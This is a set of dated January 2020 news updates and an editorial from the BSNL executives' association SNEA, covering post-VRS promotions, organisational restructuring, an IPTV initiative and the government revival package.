This Venture has already been successfully developed and implemented privately by an LCO/TIP in Thrissur BA in Kerala Circle with the technical support of BSNL in house talents led by Com Anoop K J, JTO OMCR, Ernakulam.

They have devised an App to make/receive landphone calls using mobile phone using WiFi.

This project was presented in the recently held CWC Meet of SNEA at Bangalore in August 2019.

Various Proposals have been received from different Circles for the implementation of IPTV through BSNL Network.

The absence of IPTV (or TV service) has been identified as one of the major reasons for the lacklustre response to BSNL FTTH connections from multi operator LCOs across the country.

SNEA have been pursuing the project in all levels and we are happy to see light at the end of the tunnel.

We congratulate the in-house talents in BSNL who showcased their real potential.

SNEA thanks all officers who have been working for the implementation of the project in BSNL CO and all Circle Offices, and particularly Com. P Padmanabha Rao, our AGS & DGM, BSNL CO.

IPTV Open Policy

15-01-2020

Organizational Restructuring: Merger of Non-Territorial Circles.

Maintenance and Project Circles merged and renamed as Core Network-Transmission (East/West/North/South). Separate Circle for North East namely Core Network-Transmission NE Region covering AS, NE I and NE II Circles. Effective from 04/01/2020.

Telecom Factories merged with respective Territorial Circles as BA head w.e.f 02/01/2020.

NCNGN Circle merged with BBNW Circle.

Nodal Center Chandigarh merged with Punjab Circle.

Only one Training Circle with HQ at ALTTC, Ghaziabad. ALTTC, NATFM and BRBRAITT will function as BA Heads. Only zonal RTTCs in the future.

Cover letter / Annexure

14-01-2020

GS writes to Shri P K Purwar, CMD/BSNL:

Kindly take immediate action for Regular promotion instead of Look after arrangement in different Grades from among the Executives already working in higher scales by mere designation change, to fill up the huge vacuum created in the field units by VRS 2019 and to motivate the Executives to take on the extra workload:

As per the data available, on 02/01/2020,

i) Only 57 DGM(T) will be available against the sanctioned strength of 1481.

ii) Only 32 DGM(Fin) will be available against the sanctioned strength of 402.

iii) Only 1746 AGM(T) will be available in BSNL instead of 6500 AGMs working one year back. On DGM promotion, the number of AGMs will be about 1200, less than 20%. SDEs with 15 years of service are waiting for promotion.

iv) Only 70 CAOs will be available against the sanctioned strength of 1347. They will not be sufficient even to man the vacant DGM(Fin) posts.

v) Thousands of Executives in higher scales are working in JTO, SDE equivalent grades for 5 to 30 years and waiting for the promotion. JTOs recruited from 1988 are waiting for promotion in Arch wing. Thousands of JTOs from 1999, 2001 to 2008, 2010, 2013 etc batches are waiting for their first promotion. JTO(Civil/Elect/TF) wing status is equally bad.

We totally object to the prevalent look after arrangement being followed by the management instead of regular promotion. The Executives are already working in higher scales and they may be promoted to higher grades on a regular basis just by designation change, instead of LA arrangement.

GS letter to CMD

11-01-2020

Meeting with Shri Arvind Vadnerkar, DIR(HR) on 01/09/2020: GS, President and both AGSs met DIR(HR) in the presence of Sr GM(Pers & Estt), GM(SR), GM(Restg), GM(Admn) and GMs(Pers) and held discussions on the following issues:

Staffing norms and Restructuring of BSNL: We explained that the temporary staffing norm issued by the Restg cell is not at all workable as the field realities are not considered by the management. By the temp norms, some SSAs headed by GMs today will have to be headed by an SDE in the future. There will be a large number of small SSAs with huge geographical areas where only one or two Executives will be justified. Practically, it will be impossible to maintain the services in those areas. By outsourcing, the role and responsibility of Executives will not come down, especially in the CFA segment. In Rural areas, clubbing all the works of Transmission, BTS mtce, EB and Cable maintenance under SDE(Group) with vast areas will defeat the very purpose. Similarly, the urban area norms are also stringent. So the temporary norms are to be reworked immediately. Otherwise nobody will come forward to work in the external plant and Trans mtce, and those who are working will also request posting in Indoor, mobile etc. Similarly, substitutes are not marked in many SSAs for a smooth takeover on 01/31/2020. Director and GM(Restg) explained that these are only temporary norms which can be reviewed. We requested an immediate review.

We further explained the demand from the field units that maintenance of Primary Cable should also be included in the tender for outsourcing. Among the available TTs, very few have knowledge of cable jointing and they are not sufficient to maintain all the Primary Cables. Others are required for Indoor/MDF/Power Plant maintenance. These facts were explained in the meeting with DIR(CFA) but no favorable decision has come out so far. DIR(HR) assured to bring this important issue to the notice of DIR(CFA) again.

Promotions in the post VRS scenario and the need for Regular Promotion instead of Lookafter arrangement: We strongly protested against the move for giving Look after arrangement instead of Regular promotion. Almost all DGM(T/Fin) positions and AGM/CAO/EE grades will become vacant after the VRS on 01/31/2020 and immediate action is to be taken for promotion, we demanded. Since large numbers of Executives with sufficient experience are working in higher scales, they can be simply given promotion by designation change, we pointed out. Similarly, thousands of JTOs in different wings are already in higher scales and can be given promotion by re-designation. Even a DPC is not required. LA arrangement is against the interest of the Executives as they lose the service and future promotional avenues. Management is making LA for years together and denying regular promotions. We demanded stopping this mechanism and providing regular promotions for all the eligible Executives.

On DGM promotions, SNEA explained the meeting with Secretary, DoT on 01/01/2020 and his positive decision allowing DGM promotions. Even DoT gave promotion to Sr DDG (CGM) level on 12/30/2019 for those retiring on 12/31/2019, but BSNL is not taking any action to give promotion to the vacant posts before their retirement. After discussion, DIR(HR) assured to discuss with Secretary/DoT and CMD/BSNL and do the needful for DGM promotions.

Reversion of 2001 Rect JTOs who passed the LDCE-2007: Again, discussion was held on the matter and Assn explained their eligibility with reference to the SDE RR clause 12, note 5 and the clarifications issued in 2007 regarding their eligibility to appear in the LDCE-2007. Now some of them are reverted on the basis of the clarifications issued in 2012 for the LDCE 2010. The clarifications issued regarding eligibility for appearing in LDCE 2007 and LDCE 2010 are entirely different and that made the issue complicated. The eligibility has to be decided based on the clarifications issued for LDCE 2007, we demanded. Since they had already become SDEs, they could not write the subsequent DCE held in 2012 and 2015. Among them also, some SDEs of TN Circle are facing reversion while others have been served only a show cause notice. We demanded to stop the reversion process till the matter is decided based on the facts placed before the management. We suggested forming a Committee to examine the matter. Finally DIR(HR) directed the concerned Officers to bring all the related files the next day itself for taking an appropriate decision.

10-01-2020

Meeting with Shri P. K. Purwar, CMD BSNL on 10.01.2020: General Secretaries and AGSs of AIBSNLEA and SNEA met CMD BSNL today and held discussions on the following issues:

DGM(T) Promotions: Regarding promotions from DET to DGM (T), we explained about the meetings with Secretary (T) DoT on 1st Jan and 3rd Jan 2020 in which Secretary (T) agreed to the promotions for DGM (T) provided it does not create any Additional Financial Implications. CMD BSNL informed that he had also discussed with Secretary (T) in this regard and is trying to do the needful.

Clearing of pending dues of recoveries from the Salary of the employees: CMD informed that the payment of the GPF recoveries in respect of VRS optees, about Rs.710 Crore will be released on Monday. Other dues will also be cleared at the earliest.

Promotions to fill up vacant posts after VRS: Regarding Promotions, CMD is of the opinion that employees should forget promotions for at least one year and work hard for the Revival of BSNL. He also opined that more merit is to be introduced in promotions in the future. We explained the ground realities. Almost all DGM posts in Telecom & Finance Wings as well as AGM & CAO posts will become vacant after 01/31/2020 and it will become difficult to run BSNL thereafter without filling up these vacant posts on an immediate basis. There is stagnation in the Cadres of JTO and SDE and their promotions cannot be delayed. At the time of recruitment of JTOs & JAOs as well as in promotions from JTO to SDE, the competitive examination is available and practically 50% of the Executives eligible at the time of promotion are from the competitive quota only, we explained. CMD BSNL agreed about the shortage in AGM, CAO and DGM posts after VRS 2019.

Farewell to the retiring employees: In recognition of the services of the retirees, we requested to restore the amount of Rs 3001/- as it is just a token of appreciation of their past services in BSNL and an honor for them. CMD expressed his inability due to the cash crunch in BSNL. In that case, we suggested some alternative arrangement like recharge coupons equal to that amount. CMD appreciated our suggestion and agreed to look into the alternative instead of a Cash Award.

Allotment of USOF Projects to BSNL on Nomination Basis: We apprised CMD BSNL regarding the allotment of USOF Projects to BSNL on Nomination Basis. CMD BSNL mentioned that we have to do all the Govt. Projects/USOF Projects and our performance during previous years was very good and we have completed the Govt. Projects within the time frame. However, we feel that if it is given on Nomination Basis, it will be good for BSNL; otherwise, if we compete through tender, it may not be beneficial for BSNL.

Maintenance of Primary Cables: We further apprised CMD about the difficulties faced by the Executives and various Circles in the Post-VRS Scenario in maintaining the Primary Cables, since the orders for outsourcing the maintenance of Primary Cable have not been issued by the Corporate Office. CMD BSNL mentioned that due to the developmental works going on in various States, the Primary Cable has to be replaced/maintained frequently by taking permission from various Local State Govt. Bodies/Highway Authorities, for which the Tenderer may not come forward, and our maintenance work will suffer badly.

Maintenance of MDF: We pleaded with the CMD BSNL that the control of MDF should remain with BSNL Staff. CMD BSNL mentioned that our young staff should come forward, grab the important works and take responsibility. CMD further mentioned that due to shortage of staff in the post VRS scenario it may not be possible to maintain MDF round the clock by the BSNL Staff. After detailed discussion, CMD assured to review the situation after three months.

08-01-2020

SNEA extends solidarity and moral support to the General Strike by the Central Trade Unions on 01/08/2020 against Privatization of Public Sector and other demands

07-01-2020

Circle Executive Committee meeting of Assam Circle was held at Guwahati on 01/04/2020. GS and Jt Sec(East) addressed the extended CEC meeting. CHQ leaders recollected the contribution of the senior leaders and the activists who have taken the VRS. They led the Association during various struggles for settlement of different demands and their contribution will be remembered forever. All the dues will be settled by 31.01.2020 and their parting with BSNL will be smooth.

Ultimately our struggle for years together brought good results for BSNL. Management and Govt tried to suppress our struggle by many means, by pay cuts, charge sheets, show cause notices etc., but we never compromised. Finally our struggle brought out 4G spectrum free of cost as we demanded, land monetization approved, the entire expenditure of VRS borne by the Govt, an 8500 Cr bond with sovereign guarantee approved to give financial support etc.

Our main focus is on revival of BSNL. 4G launching is planned for 03/01/2020. The tariff is increasing which is a good sign for the industry and BSNL. If management is able to implement a good mechanism taking the employees into confidence, Revival is very much possible. Everything depends on the management.

At Corporate level, BSNL restructuring is going on. In the changed scenario, guidelines are issued for outsourcing of CFA work. However, we are afraid that due to the stringent conditions, it may fail in many places and BSNL will be in big trouble in maintaining the services after 02/01/2020, we informed the management. The experienced laborers may not be able to participate in the tender. Similar work is going on in other verticals also.

As we were afraid, in the HR vertical, the number of posts is coming down drastically by restructuring. VRS has thrown up various challenges, and post reduction and promotion is one among them. The threat of post reduction was there for many years and in anticipation of that, the Association worked out a non-post based promotion policy well in advance. Now our entire focus is on its early implementation w.e.f the due date of 07/01/2018.

Unfortunately, some Executive Assn is still demanding post based promotion from a prospective date (for a few vacancies) and helping the management to stop the implementation of the new promotion policy. Management is not giving post based promotion in the name of contempt and restructuring and at the same time not implementing the new policy. All are eligible for promotion from 07/01/18 itself but they are insisting on promotion from a prospective date! The opportunity we got last year for SDE promotion for all the SDE posts was spoiled by them through their adamant attitude on the contempt petition and the demand for personal appearance of CMD and GM(Pers) in the CAT/Ernakulam.

The new promotion policy will benefit all the Executives, ensuring a smooth career progression up to AGM Grade. All the JTOs up to 2014 can become SDEs and all the SDEs up to 2016 can become Sr SDE/Sr AO or AGM/CAO as of now. Past service weightage is provided in the new policy. By that, promotion from SDE/AO to Sr SDE/Sr AO Grade will be in 3 years and SDE/AO to AGM/CAO promotion in 8 years, which could not be dreamed of in the changed scenario. After VRS, the number of posts in all the cadres will come down drastically.

By sustained struggle and continuous persuasion, we could settle many issues in the past. In 2018 we could give a record number of promotions, never heard of in the history of BSNL or DoT. Specific issues of the BSNL direct rect employees like i) EPF contribution without the ceiling, ii) 5% Superannuation benefit etc. could be settled. We will continue our efforts to resolve the remaining issues with the support of all.

06-01-2020

Circle Executive Committee meeting of Assam Circle was held at Guwahati on 01/04/2020. GS and Jt Sec(East) attended and addressed the meeting. The CEC unanimously co-opted the following Circle Office bearers:

Circle President: Com Suresh Bora, AGM.

Circle Secretary: Com Borun Baruah, JTO.

Treasurer: Com Allauddin Ahmed, AO.

The co-option became necessary as the earlier OBs opted for VRS 2019. SNEA recognizes their contribution over many years and wishes them all the best.

SNEA CHQ wishes all success to the newly elected young team.

03-01-2020

View Media Reports:

The state-controlled Bharat Sanchar Nigam Limited (BSNL) continues to be at the receiving end following bureaucratic uncertainties leading to an erosion of potential revenue opportunities on the back of Rs 20,000 crore-strong mega connectivity programs, despite the Centre's thrust to revive the stressed telco.

03-01-2020

Interaction with the Consultant M/s Deloitte:

BSNL management arranged a meeting on 01/02/2020 with the Consultant M/s Deloitte, appointed for giving recommendations on continuity of BSNL services in the post-VRS scenario and on short term measures.

GS, President and both AGSs held a detailed discussion with the consultant for about two hours, from 1600 Hrs to 1800 Hrs, focussing on all the issues that may crop up in the post VRS scenario. The consultant identified an acute shortage in the DGM, AGM and TT(TM) cadres that will have an impact after the VRS.

Discussions focused on the ground realities in field units, how they are going to be affected after VRS, immediate measures to be taken to reduce the impact, customer relations in the post VRS scenario, merger of SSA and Circle, drawbacks of the present BA structure, manpower requirement, motivation of staff, etc.

02-01-2020

GS, President and AGSs met Secretary/DoT, Member(T)/DoT, Addl Secretary/DoT, CMD, DIR(HR), DIR(Fin), Jt Sec/DoT and other senior Officers of DoT on 01/01/2020, the New Year, and held brief discussions. Discussions with CMD and DIR(HR) on important issues like restructuring and promotion are fixed for next week due to their busy schedule.

During the meeting with the Secretary/DoT we raised the issue of DGM(T) promotion, which is stopped due to the reply given by Secretary/DoT in the meeting with the Parliamentary Committee that DGM promotion can be issued only after completion of restructuring (i.e. after VRS). We explained that all the eligible DEs are getting promotion, there is no reservation involved in DE to DGM promotion, and all the 287 DEs belonging to the SC/ST category are also getting covered. Among the DEs, more than 500 DEs applied for VRS and will miss the promotion if it is issued after 01/31/2020. We further brought to his notice that on 12/30/2019, even the CGM rank officers retiring on 12/31/2019 were given promotion and allowed to avail the promotion. But in the case of BSNL Executives, just the reverse is happening.

After discussion, Secretary informed that he is agreeable to DGM promotion provided: 1) it does not have any financial implications just before VRS and 2) it does not create any issue in similar frames. We explained that it does not have any financial implications, as all are working in higher scales, and will not create any issue in similar cadres, as DGM promotion has been held up since 2017 due to litigations.

Then Secretary assured us to discuss with CMD and if the information is correct, he will give permission for DGM promotion.

01-01-2020

Editorial

2019: Turbulent period in the history of BSNL. We successfully overcame it with unprecedented Unity and Solidarity

New Year unfolds new hopes with new challenges

In 2019, we went through turbulent times, never witnessed in the history of BSNL, with agitations one after another demanding Revival of BSNL. It was really a do or die battle for the BSNL employees. Each and every committed member of SNEA dedicated the whole year to the Revival of BSNL, as each and every right thinking BSNL Executive was aware of the fact that his future depends fully upon the future of BSNL. Unfortunately, during this crucial period also, some section of employees, especially some Executives, kept away from the mainstream struggles as if the collapse of BSNL has nothing to do with them. They have to realize their mistakes and join the mainstream; otherwise the Executives are to take a call to strengthen the mainstream, leaving those negative forces.

Yes, we witnessed Repressive measures unleashed by the management and the Govt against the Associations and Unions to compel them to stop the agitations and struggles, allowing BSNL its natural death by accepting defeat. But we never relented, as we were made of different stuff, ready for any sacrifice and ready to fight to the end, till we achieve our goal. Yes, it was a do or die battle for all of us which we had to win at any cost.

Initially, the Government was not at all serious about the Revival of BSNL. All the Ministries were opposing the Revival Plan. Govt was waiting for the natural death of BSNL. The Finance Ministry was so hostile, opposing any type of Revival package and insisting on the closure of BSNL and MTNL. Struggle, side by side with the successful efforts of BSNL employees to create public and media opinion in favor of BSNL Revival, really worked wonders. SNEA was in the forefront of all such activities. The compulsion created by us for political intervention finally worked. Sincere efforts of Hon MoC and his efforts to form the GoM with the Home Minister as its Chairman, coupled with the sincere efforts of both Secretaries/DoT and both CMDs/BSNL, made things happen. Our efforts for the intervention of the Hon Prime Minister and the final call by the Hon Prime Minister himself to give a good Revival package that will really help the revival of BSNL was the most decisive factor.

Finally the BSNL and MTNL revival package was approved by the Union Cabinet on 10/23/2019, giving a new lease of life to BSNL and MTNL. The package has the real potential for the Revival of BSNL. 4G spectrum charges of Rs 14,155 Crores plus 18% GST will be borne by the Govt as demanded by us. From the beginning, AUAB demanded that Govt should allot free 4G spectrum to BSNL. Land monetization for clearing the liabilities and meeting the CAPEX also got the Cabinet approval. Our demand for financial assistance also materialized in the form of a long term bond of 10 years for 15,000 Cr for BSNL and MTNL with Government sovereign guarantee. Our concerns about the merger of MTNL with BSNL, i.e. its huge financial liability, its status as a listed company and complex HR issues, are being addressed before the merger takes place. The entire liability of about 15,000 Crores for VRS is borne by the Government, as we were opposing any additional financial burden on BSNL in the name of VRS. Allotment of 5G spectrum is another favorable decision in the offing.

Each and every employee of BSNL, especially the Comrades of SNEA, can cherish this marvelous achievement, creating another history in the Trade Union movement. Yes Comrades, we created history by struggling shoulder to shoulder with other employees for the Revival of the company, setting an example for other sectors. I am very proud and fortunate to be part of such a struggle and to lead an Association of committed members by spearheading the struggle under the banner of AUAB in the most difficult period. These are the memorable moments in life.

Now, we are at the doorsteps of 2020 with a lot of hopes and expectations. We are looking for positivity in BSNL. BSNL revival is the first among them.

4G launching on a pan India basis on the allotted spectrum should not be delayed. The customers are eagerly waiting for that moment. Equally, BSNL is answerable to the Govt also after the allotment of free 4G spectrum. Modernization of the network is to be expedited. Operational issues and clearing the outstanding dues to the laborers, contractors, vendors, land owners etc. are the immediate challenges to make any outsourcing model successful. BSNL has to regain confidence among them by clearing their dues, which will open the road for the future. Realizing the money through the sovereign bond and land monetization are two important measures in that direction. Management has to come out of the VRS syndrome and start working on these issues to make sure that BSNL continues to provide uninterrupted services after 01/31/2020. A large number of loyal customers are really worried about the massive voluntary retirement and it is our responsibility to regain their confidence in the post VRS scenario. In this regard, management decisions will be very crucial.

In addition to the above issues, how management is going to motivate the remaining 47% of employees to take on the entire workload in the post VRS situation, how they are filling up the vacuum created in the field units which generate revenue etc. will have a huge impact on the efforts for the revival of BSNL. The shortage of Executives at higher levels can be easily met by promotion, which can be done within a couple of days under the new policy, simply by taking VC.

No more excuses can be made by DoT/Government and BSNL management in the name of employee cost, as more than 50% of employees took VRS, exceeding their target. We already warned management that an unprofessional and drastic reduction in the Executives' strength will have an adverse impact on the BSNL revival and that good workers are to be retained in BSNL. All depends on how management utilizes the remaining employees gainfully in the post VRS scenario. A professional approach and quick policy decisions can once again bring BSNL back on track.

Let us hope that 2020 will bring good news for BSNL and the entire nation.